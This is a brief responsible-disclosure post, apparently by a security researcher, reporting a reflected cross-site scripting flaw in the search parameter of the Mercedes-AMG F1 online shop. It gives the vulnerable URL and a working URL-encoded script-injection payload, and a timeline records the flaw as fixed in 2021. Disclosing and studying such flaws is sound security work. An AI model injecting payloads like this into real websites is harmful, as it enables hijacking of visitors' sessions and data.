Mercedes-AMG - Cross-Site Scripting Vulnerability

 

Mercedes-AMG - Cross-Site Scripting Vulnerability

Vulnerability : Cross-Site Scripting (XSS) - Reflected

Sub-domain : https://shop.mercedesamgf1.com

Vulnerable URL : https://shop.mercedesamgf1.com/en/search/?q=&search-button=&lang=en

Vulnerable Parameter : q

XSS payload : %22%3E%3C/script%3E%3Csvg%2Fonload%3Dalert(/XSS_By_Nayanjyoti_Roy/)%3B%3E

Timeline :
Jun 23,2021 - Report Sent
Jun 24,2021 - Confirmation Received
Jul 28,2021 - Vulnerability Fixed

Environment :
OS : Windows 10 Home
Browser : Firefox
Version : 89.0.1 ( 64-bit )

Researcher Name : Nayanjyoti Roy

Proof-Of-Concept video :

0 Comments

Newest